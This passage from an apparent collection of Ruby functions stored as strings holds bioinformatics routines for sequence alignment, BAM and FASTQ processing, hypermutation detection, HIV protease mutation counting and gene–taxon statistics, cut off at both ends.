get_identified_group(identity_with_90,group_hash,reversed_group_hash) # identified_group_at_aa_level contains confirmed group in aa level \n else\n # if identity_with_90.length == 0; no RD with ~=90% identity => create new RD groups\n\n if aa_similarity >= aa_threshold\n last_group = CustomizedProteinSequence.group(:group).order(:group).last.group\n new_group_number = last_group + 1\n result_array << collection(query_name,\"NEW\", \"Your sequence belongs to a new RD group: #{new_group_number}\",new_group_number)\n else\n result_array << collection(query_name, \"FAILED\",\"Your sequence doesn't share 90\\% identity of any sequences in database at amino acid level.\")\n end\n\n return result_array\n end\n\n if identified_group_at_aa_level.length > 0\n result_array << collection(query_name, \"SUCCESS\",\"Your sequence belongs RD group: #{identified_group_at_aa_level.join(\",\")}\",identified_group_at_aa_level.join(\",\"))\n else\n result_array << collection(query_name, \"FAILED\",\"Your sequence doesn't share 90\\% identity with all representatives of the group at amino acid level.\")\n end\n\n return result_array\n \n rescue => exception\n # puts exception\n result_array << collection(query_name, \"ERROR\",\"Your sequence is not validated. Or send it to our lab for manual checking.\")\n end\n \n return result_array\n\n end",
"def fix_gags(hash_of_sequence_ids_to_sequence_strings, sequence_id_to_gags={})\n log = Bio::Log::LoggerPlus['bio-gag']\n \n # Get the gags\n if sequence_id_to_gags == {}\n log.info \"Predicting gags from the pileup\"\n gags do |gag|\n sequence_id_to_gags[gag.ref_name] ||= []\n sequence_id_to_gags[gag.ref_name].push gag\n end\n else\n log.info \"Using pre-specified GAG errors\"\n end\n log.info \"Found #{sequence_id_to_gags.values.flatten.length} gag errors to fix\"\n \n # Make sure all gag errors in the pileup map to a sequence input fasta file by keeping tally\n accounted_for_seq_ids = []\n fixed_sequences = {} #Hash of sequence ids to sequences without gag errors\n hash_of_sequence_ids_to_sequence_strings.each do |seq_id, seq|\n log.debug \"Now attempting to fix sequence #{seq_id}, sequence #{seq}\"\n toilet = sequence_id_to_gags[seq_id]\n if toilet.nil?\n # No gag errors found in this sequence (or pessimistically the sequence wasn't in the pileup -leaving that issue to the user though)\n fixed_sequences[seq_id] = seq\n else\n # Gag error found at least once somewhere in this sequence\n # Record that this was touched in the pileup\n accounted_for_seq_ids.push seq_id\n \n # Output the fixed-up sequence\n last_gag = 0\n fixed = ''\n toilet.sort{|a,b| a.position<=>b.position}.each do |gag|\n #log.debug \"Attempting to fix gag at position #{gag.position} in sequence #{seq_id}, which is #{seq.length} bases long\"\n fixed = fixed+seq[last_gag..(gag.position-1)]\n fixed = fixed+seq[(gag.position-1)..(gag.position-1)]\n last_gag = gag.position\n #log.debug \"After fixing gag at position #{gag.position}, fixed sequence is now #{fixed}\"\n end\n fixed = fixed+seq[last_gag..(seq.length-1)]\n fixed_sequences[seq_id] = fixed\n end\n end\n \n unless accounted_for_seq_ids.length == sequence_id_to_gags.length\n log.warn \"Unexpectedly found GAG errors in sequences that weren't in the sequence that are to be fixed: Found gags in #{sequence_id_to_gags.length}, but only fixed #{accounted_for_seq_ids.length}\"\n end\n return fixed_sequences\n end",
"def process_bam(input_file, fasta, skip)\n\n\t\t# general settings\n\t\texclude = []\n\t\tFile.open(skip, 'r').readlines.each {|line| exclude << line.strip}\n\t\tfirstline = TRUE \n\t\tanchor_left = nil\n\t\tanchor_right = nil\n\t\tchr_a = nil\n\t\tchr_b = nil\n\t\tinput_hash = {}\n\n\t\t# Initiate chromosome hash\n\t\tDir.foreach(fasta) do |item|\n\t\t\tchr = item.sub('.fa', '')\n\t\t\tnext if item == '.' || item == '..' || exclude.include?(chr) \n\t\t\tinput_hash[chr] = {}\n\t\tend\n\n\t\tinput_hash.each_key do |chr_a|\n\t\t\tinput_hash.keys.each {|chr_b| input_hash[chr_a][chr_b] = []}\n\t\tend\n\n\t\t# read bam file\n\t\tinput_file.each do |line|\n\t\t\tline = line.strip.split(/\\s+/)\n\t\t\n\t\t\tif firstline \n\t\t\t\tanchor_left = ReadBam.new(line)\n\t\t\t\tfirstline = FALSE\n\t\t\t\tchr_a = anchor_left.chr\n\t\t\telse\n\t\t\t\tanchor_right = ReadBam.new(line)\n\t\t\t\tchr_b = anchor_right.chr\n\t\t\t\t\n\t\t\t\tif input_hash.has_key?(chr_a) && interChimeric?(anchor_left, anchor_right, exclude)\n\t\t\t\t\t\n\t\t\t\t\tif anchor_left.strand == 1 && anchor_right.strand == 1\n\t\t\t\t\t\tinput_hash[chr_b][chr_a] << [anchor_right, anchor_left] \n\t\t\t\t\telsif anchor_left.strand == -1 && anchor_right.strand == -1\n\t\t\t\t\t\tinput_hash[chr_a][chr_b] << [anchor_left, anchor_right] \n\t\t\t\t\telse\n\t\t\t\t\t\tinput_hash[chr_b][chr_a] << [anchor_right, anchor_left] \n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\t\n\t\t\t\tanchor_left, anchor_right = nil\n\t\t\t\tfirstline = TRUE\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Found anchor pairs.\"\t\t\n\t\tinput_hash\n\tend",
"def a3g_hypermut(ref = nil)\n # mut_hash number of apobec3g/f mutations per sequence\n mut_hash = {}\n hm_hash = {}\n out_hash = {}\n\n # total G->A mutations at apobec3g/f positions.\n total = 0\n\n unless ref \n # make consensus sequence for the input sequence hash\n ref = self.consensus\n end\n\n # obtain apobec3g positions and control positions\n apobec = apobec3gf(ref)\n mut = apobec[0]\n control = apobec[1]\n\n self.dna_hash.each do |k,v|\n a = 0 # muts\n b = 0 # potential mut sites\n c = 0 # control muts\n d = 0 # potenrial controls\n mut.each do |n|\n if v[n] == \"A\"\n a += 1\n b += 1\n else\n b += 1\n end\n end\n mut_hash[k] = a\n total += a\n\n control.each do |n|\n if v[n] == \"A\"\n c += 1\n d += 1\n else\n d += 1\n end\n end\n rr = (a/b.to_f)/(c/d.to_f)\n\n t1 = b - a\n t2 = d - c\n\n fet = ViralSeq::Rubystats::FishersExactTest.new\n fisher = fet.calculate(t1,t2,a,c)\n perc = fisher[:twotail]\n info = [k, a, b, c, d, rr.round(2), perc]\n out_hash[k] = info\n if perc < 0.05\n hm_hash[k] = info\n end\n end\n\n if self.dna_hash.size > 200\n rate = total.to_f/(self.dna_hash.size)\n count_mut = mut_hash.values.count_freq\n maxi_count = count_mut.values.max\n poisson_hash = ViralSeq::Math::PoissonDist.new(rate,maxi_count).poisson_hash\n cut_off = 0\n poisson_hash.each do |k,v|\n cal = self.dna_hash.size * v\n obs = count_mut[k]\n if obs >= 20 * cal\n cut_off = k\n break\n elsif k == maxi_count\n cut_off = maxi_count\n end\n end\n mut_hash.each do |k,v|\n if v > cut_off\n hm_hash[k] = out_hash[k]\n end\n end\n end\n\n hm_seq_hash = ViralSeq::SeqHash.new\n hm_hash.each do |k,_v|\n hm_seq_hash.dna_hash[k] = self.dna_hash[k]\n end\n \n hm_seq_hash.title = self.title + \"_hypermut\"\n hm_seq_hash.file = self.file\n filtered_seq_hash = self.sub(self.dna_hash.keys - hm_hash.keys)\n return { a3g_seq: hm_seq_hash,\n filtered_seq: filtered_seq_hash,\n stats: hm_hash.values\n }\n end",
"def rpkm(counts, total_mapped_reads, gene_length)\n if counts && gene_length\n sprintf(\"%.2f\",(1e9*counts.to_f)/(total_mapped_reads*gene_length)).to_f\n else\n 0.0\n end\nend",
"def seed_extension(input_hash, anchor_length, read_length, fasta, output_file, mm = 1, max_overhang = read_length + 8)\n\n\t\toutput_hash = {}\n\t\n\t\tinput_hash.each do |chr_a, chromosomes|\n\t\t\t# Load reference\n\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\theader = fasta_file.gets.strip\n\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\tchromosomes.each do |chr_b, anchorpairs|\n\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n \t\t\theader = fasta_file.gets.strip\n \t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t# Loop through hash to extend seeds for each pair\n\t\t\t\tanchorpairs.each do |pair|\n\t\t\t\t\tupstream, downstream = pair\n\t\t\t\t\tqname, mate, read = upstream.id.split('_')[0..2]\n\n\t\t\t\t\tupstream.strand == 1 ? upstream_read = read : upstream_read = Alignment.reverse_complement(read)\n\t\t\t\t\tdownstream.strand == 1 ? downstream_read = read : downstream_read = Alignment.reverse_complement(read)\n\t\t\t\t\t\n\t\t\t\t\tup = dna_a[upstream.start - read_length + anchor_length..upstream.start + anchor_length - 1].upcase\n\t\t\t\t\tdown = dna_b[downstream.start..downstream.start + read_length - 1].upcase\t\n\t\t\t\t\n\t\t\t\t\tif upstream.strand == downstream.strand\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.upstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.downstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start - upstream_alignmentlength + anchor_length\t\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start + downstream_alignmentlength - 1\n\n\t\t\t\t\telsif upstream.strand == 1 && downstream.strand == -1\n\t\t\t\t\t\tdown = dna_b[downstream.start - read_length + anchor_length..downstream.start + anchor_length - 1].upcase\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.upstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.upstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start - upstream_alignmentlength + anchor_length\t\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start - downstream_alignmentlength + anchor_length\t\n\t\t\t\t\n\t\t\t\t\telse\n\t\t\t\t\t\tup = dna_a[upstream.start..upstream.start + read_length - 1].upcase\t\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.downstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.downstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start + upstream_alignmentlength - 1\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start + downstream_alignmentlength - 1\n\t\t\t\t\tend\n\n\t\t\t\t\ttotal_alignmentlength = upstream_alignmentlength + downstream_alignmentlength\n\n\t\t\t\t\tif total_alignmentlength >= read_length && total_alignmentlength <= max_overhang\n\t\t\t\t\t\toverhang = total_alignmentlength - read_length\n\t\n\t\t\t\t\t\tqname = qname.to_sym\n\t\t\t\t\t\tsummary = [chr_a, upstream_breakpoint, upstream.strand, chr_b, downstream_breakpoint, downstream.strand, total_alignmentlength, mate] \n\t\t\t\t\t\t# Candidates for which both, R1 and R2, are present are deleted\n\t\t\t\t\t\t# One read can neither fall on two different non-canonical nor the same junction\n\t\t\t\t\t\tif !output_hash.has_key?(qname)\n\t\t\t\t\t\t\toutput_hash[qname] = summary\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\toutput_hash.delete(qname)\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\toutput_hash.each do |qname, v| \n\t\t\t\toutput.puts 
[\"#{qname.to_s}/#{v[-1]}\", v[0..-2]].join(\"\\t\") if (v[2] - v[1]).abs >= read_length\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Seed extension succeded.\"\n\tend",
"def scan_gene_blo_seqs\n GeneBloSeq.destroy_all\n\n genes = Gene.find(:all)\n\n genes.each { |gn|\n\n #assemble gene file location\n gene_blo_runs_f = \"#{AppConfig.gene_blo_runs_dir}/#{gn.name}.fasta\"\n gene_blo_seqs_f = \"#{AppConfig.gene_blo_seqs_dir}/#{gn.name}.fasta\"\n gene_blo_seqs_p = \"#{AppConfig.gene_blo_seqs_dir}/#{gn.name}.phy\"\n\n \n gene_blo_runs_oa = @ud.fastafile_to_original_alignment(gene_blo_runs_f)\n gene_blo_seqs_oa = Bio::Alignment::OriginalAlignment.new\n\n\n\n puts \"gn.seqs_orig_nb:#{gn.seqs_orig_nb} oa_size: #{gene_blo_runs_oa.size}\"\n\n #schould be equal\n #should insert assertion here or make an rspec to detect source\n #puts oa.keys\n\n gene_blo_runs_oa.each_pair { |key, seq|\n puts key, seq\n gbs = GeneBloSeq.new\n #find corresponding gi\n ns = NcbiSeq.find_by_vers_access(key)\n #link to objects gene and gi\n gbs.gene = gn\n gbs.ncbi_seq = ns\n gbs.save\n gene_blo_seqs_oa.add_seq(seq,ns.id)\n\n }\n \n #save fasta file \n @ud.string_to_file(gene_blo_seqs_oa.output(:fasta),gene_blo_seqs_f)\n #save phylip file\n @ud.string_to_file(gene_blo_seqs_oa.output(:phylip),gene_blo_seqs_p)\n\n\n\n\n }\n\n end",
"def align_local(protein)\n # Vytvoreni tabulky\n x = protein.sequence.size\n y = @genome.sequence.size\n tab = Array.new(x+1) { Array.new(y+1) }\n\n # Vyplnime prvni radek a sloupec\n for i in 0..x\n tab[i][0] = 0\n end\n for j in 0..y\n tab[0][j] = 0\n end\n\n for i in 1..x\n for j in 1..y\n match = tab[i-1][j-1] + match(i, j, protein)\n delete = tab[i-1][j] + @@d\n insert = tab[i][j-1] + @@d\n\n tab[i][j] = [match, delete, insert, 0].max\n end\n end\n\n @table = tab\n value = 0\n @lok_max_coordinates = [0,0]\n for i in 1..x\n for j in 1..y\n if tab[i][j] >= value\n value = tab[i][j]\n @lok_max_coordinates = [i, j]\n end\n end\n end\n EvaluatedProtein.new(protein, value)\n end",
"def clustal_consensus_multi(seq_hash,open = 15, ext = 6.66, gap_treatment = 1)\n gapopen = open\n gapext = ext\n temp_dir = File.dirname($0)\n temp_file_in = temp_dir + \"/temp_sequence\"\n f = File.open(temp_file_in,'w')\n f.puts seq_hash.flatten\n f.close\n\n temp_file_out = temp_dir + \"/temp_out\"\n temp_screen_out = temp_dir + \"/temp_screen\"\n print `/applications/clustalw2 -infile=#{temp_file_in} -case=upper -outorder=input -output=gde -outfile=#{temp_file_out} >#{temp_screen_out} -gapopen=#{gapopen} -gapext=#{gapext}`\n h = {}\n File.open(temp_file_out,\"r\") do |file|\n n = 0\n file.readlines.each do |line|\n if line =~ /^\\#/\n n += 1\n h[n] = \"\"\n else\n h[n] += line.chomp\n end\n end\n end\n length = h[1].size\n consensus_bases = []\n (0..(length-1)).each do |n|\n bases = []\n h.values.each do |seq|\n bases << seq[n]\n end\n if gap_treatment == 1\n consensus_bases << creat_consensus_base_non_gap(bases)\n else\n consensus_bases << creat_consensus_base_gap(bases)\n end\n end\n File.unlink temp_file_in\n File.unlink temp_file_out\n File.unlink temp_screen_out\n Dir.chdir(temp_dir) do\n Dir.glob(\"*.dnd\") do |dnd|\n File.unlink(dnd)\n end\n end\n consensus_seq = consensus_bases.join('')\nend",
"def sdrm_pr_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"PR\"\n rf_label = 0\n start_codon_number = 1\n n_seq = sequences.size\n mut = {}\n mut_com = []\n aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n aa[name] = aa_seq.join(\"\")\n record = hiv_protease(aa_seq)\n mut_com << record\n record.each do |position,mutation|\n if mut[position]\n mut[position][1] << mutation[1]\n else\n mut[position] = [mutation[0],[]]\n mut[position][1] << mutation[1]\n end\n end\n end\n mut.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [region, n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n aa_start = start_codon_number\n\n aa_size = aa.values[0].size - 1\n\n (0..aa_size).to_a.each do |p|\n aas = []\n aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
"def check_duplication (n=10)\n\n # get the first n hits\n less_hits = @hits[0..[n-1,@hits.length].min]\n averages = []\n\n less_hits.each do |hit|\n # indexing in blast starts from 1\n start_match_interval = hit.hsp_list.each.map{|x| x.hit_from}.min - 1\n end_match_interval = hit.hsp_list.map{|x| x.hit_to}.max - 1\n \n #puts \"#{hit.xml_length} #{start_match_interval} #{end_match_interval}\" \n\n coverage = Array.new(hit.xml_length,0)\n hit.hsp_list.each do |hsp|\n aux = []\n # for each hsp\n # iterate through the alignment and count the matching residues\n [*(0 .. hsp.align_len-1)].each do |i|\n residue_hit = hsp.hit_alignment[i]\n residue_query = hsp.query_alignment[i]\n if residue_hit != ' ' and residue_hit != '+' and residue_hit != '-'\n if residue_hit == residue_query \n idx = i + (hsp.hit_from-1) - hsp.hit_alignment[0..i].scan(/-/).length \n aux.push(idx)\n #puts \"#{idx} #{i} #{hsp.hit_alignment[0..i].scan(/-/).length}\"\n # indexing in blast starts from 1\n coverage[idx] += 1\n end\n end\n end\n end\n overlap = coverage.reject{|x| x==0}\n averages.push(overlap.inject(:+)/(overlap.length + 0.0))\n end\n \n # if all hsps match only one time\n if averages.reject{|x| x==1} == []\n return [\"NO\",1]\n end\n\n R.eval(\"library(preprocessCore)\")\n\n #make the wilcox-test and get the p-value\n R.eval(\"coverageDistrib = c#{averages.to_s.gsub('[','(').gsub(']',')')}\")\n R. eval(\"pval = wilcox.test(coverageDistrib - 1)$p.value\")\n pval = R.pull \"pval\"\n\n if pval < 0.01\n status = \"YES\"\n else\n status = \"NO\"\n end\n return [status, pval]\n end",
"def getAlignAndErrorPercent()\n alignmentResultFile = \"BAMAnalysisInfo.xml\"\n\n if !File::exist?(alignmentResultFile)\n raise \"Error: Did not find \" + alignmentResultFile\n end\n\n xmlDoc = Hpricot::XML(open(alignmentResultFile))\n\n xmlDoc.search(\"AnalysisMetrics/AlignmentResults\").each do |alnRes|\n readType = alnRes['ReadType']\n\n if readType.eql?(\"READ\" + @readType)\n readInfoElem = alnRes.search(\"ReadInfo\")\n\n if readInfoElem != nil\n @percentAligned = readInfoElem[0]['PercentMapped']\n @percentError = readInfoElem[0]['PercentMismatch']\n end\n end\n end\n end",
"def run_aggregation\n GRADES.each_with_index do |grade, idx|\n classifier[grade].each_pair do |metric, values|\n all_values = values\n all_values += classifier[GRADES[idx + 1]][metric] if (idx + 1) < GRADES.count\n\n classifier[grade][metric] =\n if all_values.count <= 2\n values.max || 0\n else\n (all_values.sum / all_values.count).round(2)\n end\n end\n end\n end",
"def compute(name, ref, span, snps)\n return if span.length < 1\n\n span.sort! {|a,b| a[0] <=> b[0]}\n head = span.shift\n ss,ee = head[0],head[1]\n array = []\n \n array << ss \n span.each do |breaks|\n array << breaks[0]\n array << breaks[1]\n end\n array << ee \n\n while array.size > 0\n s = array.shift\n e = array.shift\n# $stderr.puts \"#{ref}\\t#{s}\\t#{e}\"\n (s..e).each do |i|\n @coverage[ref][i] += 1 #Compute coverage on base i\n end\n end\n\n snps.each_key do |pos|\n refbase = @seq[ref][pos-1,1].upcase\n curbase = snps[pos][:snpbase]\n if snps.key?(pos + 1) or snps.key?(pos + 2) or snps.key?(pos - 1) or snps.key?(pos - 2)\n if snps.key?(pos + 1) and refbase == snps[pos+1][:snpbase] and curbase == @seq[ref][pos,1].upcase\n snps[pos][:info] << \"swap;\"\n elsif snps.key?(pos - 1) and refbase == snps[pos-1][:snpbase] and curbase == @seq[ref][pos-2,1].upcase \n snps[pos][:info] << \"swap;\"\n elsif snps.key?(pos + 2) and refbase == snps[pos+2][:snpbase] and curbase == @seq[ref][pos+1,1].upcase\n snps[pos][:info] << \"swap;\"\n elsif snps.key?(pos - 2) and refbase == snps[pos-2][:snpbase] and curbase == @seq[ref][pos-3,1].upcase\n snps[pos][:info] << \"swap;\"\n elsif snps.key?(pos + 1) or snps.key?(pos - 1) \n snps[pos][:info] << \"mnp;\"\n else\n snps[pos][:info] << \"snp;\" \n end\n else\n snps[pos][:info] << \"snp;\" \n end\n @snp[ref][pos] = '' unless @snp[ref].key?(pos)\n @snp[ref][pos] << snps[pos][:info]\n end\nend",
"def align\n [:owner, :group, :size].each do |field|\n current = @alignment[field]\n @buffer.each do |line|\n new = line[field].length\n current = new if current < new\n end\n @alignment[field] = current\n end\n end",
"def find_alignment (alignment)\r\n total = 0\r\n weighted_alignment = alignment.each do |alignment|\r\n alignment.weight = alignment.weight + total\r\n total = alignment.weight\r\n alignment\r\n end\r\n percentage = rand(1..total)\r\n weighted_alignment.each do |alignment|\r\n return alignment.name if percentage <= alignment.weight\r\n end\r\nend",
"def align\n @genome = Genome.find(params[:id])\n @proteins = Protein.all\n @method = params[:method]\n\n if params[:method] == 'local'\n @message = 'Local alignment'\n align_all_local\n elsif params[:method] == 'global'\n @message = 'Global alignment'\n align_all_global\n end\n\n end",
"def align_all_global\n @results = []\n @proteins.each { |protein|\n @results << align_global(protein)\n }\n @results = @results.sort_by { |evaluated_protein| evaluated_protein.value }\n end",
"def align(ref, ref_base, software, opts = {})\n if software == :tophat\n bt_flag =\n opts[:tophat_aligner] == :bowtie1 ? '--bowtie1' : ''\n gap_flag =\n opts[:mismatches] < 2 ? \"--read-gap-length #{opts[:mismatches]}\" : ''\n end\n\n aln_cmd = {\n bowtie1:\n 'bowtie' \\\n \" --seedlen=#{opts[:seedlen]} #{ref_base}\" \\\n \" --un=#{@names.get('fp')}\" \\\n \" -q #{@names.get('trim')} \" \\\n \" --sam #{@names.get('ncrna')}\",\n bowtie2:\n 'bowtie2' \\\n \" --un #{@names.get('fp')}\" \\\n \" -x #{ref_base}\" \\\n \" -L #{opts[:seedlen]}\" \\\n \" -U #{@names.get('trim')}\" \\\n \" -S #{@names.get('ncrna')}\",\n bwa:\n 'bwa mem' \\\n \" -k #{opts[:seedlen]}\" \\\n \" #{ref} \" \\\n \" #{@names.get('trim')} \" \\\n \"| samtools view -b - > #{@names.get('ncrna')} \" \\\n '&& bam2fastq' \\\n \" -o #{@names.get('fp')}\" \\\n \" --no-aligned #{@names.get('ncrna')}\",\n tophat:\n 'tophat' \\\n \" --read-edit-dist #{opts[:mismatches]}\" \\\n \" #{bt_flag}\" \\\n \" -N #{opts[:mismatches]}\" \\\n \" --output-dir #{@names.get('topout')}\" \\\n ' --no-novel-juncs' \\\n \" #{gap_flag}\" \\\n \" --GTF #{opts[:annotation]}\" \\\n \" #{ref_base} #{@names.get('fp')}\",\n star:\n 'STAR' \\\n \" --genomeDir #{ref_base}\" \\\n \" --outFilterMismatchNmax #{opts[:mismatches]}\" \\\n \" --readFilesIn #{@names.get('fp')}\"\\\n \" --outFileNamePrefix #{@names.get('mapped_all')}\"\n }\n\n target =\n opts[:seedlen].nil? ? @names.get('mapped_all') : @names.get('fp')\n run_cmd(aln_cmd[software]) unless skip_step?(target, 'aligning')\n [@names.get('mapped_all'), @names.get('unmapped')]\n end",
"def calculate_fitness\n return 'done' if @dna == @target_dna\n fit_arr = []\n @target_dna.each_with_index do |e, i|\n fit_arr.push((@dna[i] - e).abs)\n end\n (1 / fit_arr.inject(:+).to_f) * 100\n end",
"def bam2fastq(input_file, output_file, phred_quality)\n \t\tFile.open(output_file, 'w') do |output|\n\t\t\tinput_file.each do |line|\n \t\t\tline = line.strip.split(/\\s+/)\n \n \t\t\tflag = line[1].to_i\n \t\t\tflag & 0x40 > 0 ? mate = '1' : mate = '2'\n \t\t\t\n \t\t\tqname, sequence, quality = line[0], line[9], line[10] \n \t\t\toutput.puts \"@#{qname}/#{mate}\", sequence, '+', quality if Alignment.quality_ok?(quality, phred_quality)\n \t\tend\n \tend\n \t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Converted unmapped reads into fastq-format.\"\t\n\tend",
"def before_results(controller_params)\n @num_seqs = 0\n @header = []\n @aln_blocks = []\n \n resfile = File.join(job_dir, jobid+\".out\")\n raise(\"ERROR with resultfile!\") if !File.readable?(resfile) || !File.exists?(resfile) || File.zero?(resfile)\n res = IO.readlines(resfile).map {|line| line.chomp}\n \n sequencefile = File.join(job_dir, jobid+\".fasta\")\n seqs = IO.readlines(sequencefile).map {|line| line.chomp}\n \n hits = []\n res.each do |line|\n \thits << line.split(/ /)[0]\n end\n logger.debug \"Hits: #{hits.inspect}\"\n\n seqfile = File.join(job_dir, jobid+\".seq\")\n \n # write one sequencs of each cluster in seqfile\n check = false\n File.open(seqfile, 'w') do |file|\n seqs.each do |line|\n if (line =~ /^>(.*)$/)\n header = ($1.split(/ /))[0]\n check = false\n if (hits.include?(header) || (header =~ /gi\\|(\\d+)\\|/ && hits.include?($1)))\n file.write(line + \"\\n\")\n check = true\n end\n else\n if check\n file.write(line + \"\\n\")\n end\n end\n end\n end\n\n\n # read in sequences for output\n res = IO.readlines(seqfile).map {|line| line.chomp}\n\n seq = \"\"\n res.each do |line|\n if (line =~ /^>/)\n if (!seq.empty?) then @aln_blocks.push(seq) end\n @header.push(line)\n @num_seqs += 1\n seq = \"\"\n else\n seq += line + \"\\n\"\n end\n end\n if (!seq.empty?) then @aln_blocks.push(seq) end\n \n # write sequences in lines with 80 characters\n @aln_blocks.map! do |seq|\n \ti = 0\n \tnew_seq = \"\"\n \twhile (i+80 < seq.length)\n \t\tnew_seq += seq.slice(i...i+80) + \"\\n\"\n \t\ti += 80\n \tend\n \tnew_seq += seq.slice(i...i+80) + \"\\n\"\n end\n end",
"def calc_global_stats()\n\n #common set of genes\n \n core_genes_ids = [110,111,112,113,114,115,119,123,136,137,138,139,140,141,149,154,156,157,159,164,168,181,182,183,184,186,193,195,196,199,202,204,206,216]\n \n self.genes_core = Gene.find(:all, :conditions => { :id => core_genes_ids })\n self.genes_all = Gene.find(:all)\n #puts \"genes: #{genes.inspect}\"\n\n self.taxons_cnt = NcbiSeqsTaxon.count(:distinct => true)\n puts \"taxons_cnt: #{taxons_cnt}\"\n\n\n #img_tot_cnt\n self.itc_hsh = ProkGroup.find(:all) \\\n .each_with_object({ }){ |c, hsh| hsh[c.id] = c.img_tot_cnt }\n\n\n #prok group taxon number\n #all small n as constant\n #self.pgtn_hsh = Taxon.joins(:ncbi_seqs_taxon) \\\n # .joins(:taxon_group) \\\n # .group(\"prok_group_id\") \\\n # .select(\"prok_group_id, count(*) as cnt\") \\\n # .each_with_object({ }){ |c, hsh| hsh[c.prok_group_id] = c.cnt }\n\n self.pgtn_hsh_core = Taxon.find_by_sql(\"select pg.ID as prok_group_id,\n nvl(t2.cnt,0) as cnt\nfrom PROK_GROUPS pg\nleft outer join \n(\nselect pg.id, count(*) as cnt\nfrom PROK_GROUPS pg\n join TAXON_GROUPS tg on tg.PROK_GROUP_ID = pg.ID\n join NCBI_SEQS_TAXONS nst on nst.TAXON_ID = tg.TAXON_ID\nwhere nst.TAXON_ID in (select distinct tx.ID\n from taxons tx\n\t\t\t\t\t join NCBI_SEQS ns on ns.TAXON_ID = tx.ID\n\t\t\t\t\t join GENE_BLO_SEQS gbs on gbs.NCBI_SEQ_ID = ns.id\n\t\t\t\t\t join taxon_groups tg on tg.TAXON_ID = tx.ID\n\t\t\t\t\t where gbs.GENE_ID in (110,111,112,113,114,115,119,123,136,137,138,139,140,141,149,154,156,157,159,164,168,181,182,183,184,186,193,195,196,199,202,204,206,216)\n)\ngroup by pg.id\n) t2 on t2. id = pg.id \n\").each_with_object({ }){ |c, hsh| hsh[c.prok_group_id] = c.cnt.to_f }\n\nself.pgtn_hsh_all = Taxon.find_by_sql(\"select pg.ID as prok_group_id,\n nvl(t2.cnt,0) as cnt\nfrom PROK_GROUPS pg\nleft outer join \n(\nselect pg.id, count(*) as cnt\nfrom PROK_GROUPS pg\n join TAXON_GROUPS tg on tg.PROK_GROUP_ID = pg.ID\n join NCBI_SEQS_TAXONS nst on nst.TAXON_ID = tg.TAXON_ID\nwhere nst.TAXON_ID in (select distinct tx.ID\n from taxons tx\n\t\t\t\t\t join NCBI_SEQS ns on ns.TAXON_ID = tx.ID\n\t\t\t\t\t join GENE_BLO_SEQS gbs on gbs.NCBI_SEQ_ID = ns.id\n\t\t\t\t\t join taxon_groups tg on tg.TAXON_ID = tx.ID\n)\ngroup by pg.id\n) t2 on t2. id = pg.id \n\").each_with_object({ }){ |c, hsh| hsh[c.prok_group_id] = c.cnt.to_f }\n\n \n \n \n \n #puts @pgtn_hsh.inspect\n\n #prok group sequence number\n #find nb of sequences in group\n #debug\n #Rails.logger.level = 0 # at any time\n self.pgsn_hsh_all = Taxon.joins(:ncbi_seq => :gene_blo_seq) \\\n .joins(:taxon_group) \\\n .group(\"prok_group_id\") \\\n .select(\"prok_group_id, sum(weight_pg) as cnt\") \\\n .each_with_object({ }){ |c, hsh| hsh[c.prok_group_id] = c.cnt }\n \n self.pgsn_hsh_core = Taxon.joins(:ncbi_seq => :gene_blo_seq) \\\n .joins(:taxon_group) \\\n .where({ \"GENE_BLO_SEQS.gene_id\" => core_genes_ids }) 